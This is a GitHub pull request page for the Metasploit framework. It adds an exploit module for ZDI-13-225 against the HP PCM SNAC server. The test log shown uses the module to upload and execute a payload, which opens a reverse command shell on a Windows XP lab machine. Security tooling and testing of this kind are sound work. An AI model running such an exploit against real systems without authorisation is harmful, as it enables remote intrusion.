Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module for ZDI-13-225 #2366

Merged
merged 3 commits into from Sep 16, 2013
Merged

Add module for ZDI-13-225 #2366

merged 3 commits into from Sep 16, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested with the SNAC server included with HP PCM 4.0

msf > use exploit/windows/http/hp_pcm_snac_update_certificates 
msf exploit(hp_pcm_snac_update_certificates) > set rhost 192.168.172.244
rhost => 192.168.172.244
msf exploit(hp_pcm_snac_update_certificates) > check
[*] The target appears to be vulnerable.
msf exploit(hp_pcm_snac_update_certificates) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.244:443 - Getting a valid session...
[*] 192.168.172.244:443 - Uploading payload...
[*] 192.168.172.244:443 - Executing payload...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.244:2552) at 2013-09-13 17:32:54 -0500

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Hewlett-Packard\PCM\snac\bin>exit
exit

[*] 192.168.172.244 - Command shell session 1 closed.  Reason: Died from EOFError

msf exploit(hp_pcm_snac_update_certificates) > exit -y

wchen-r7 added a commit that referenced this pull request Sep 16, 2013
@wchen-r7 wchen-r7 merged commit 10303a8 into rapid7:master Sep 16, 2013
@jvazquez-r7 jvazquez-r7 deleted the zdi_13_225 branch November 18, 2014 15:59
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

2 participants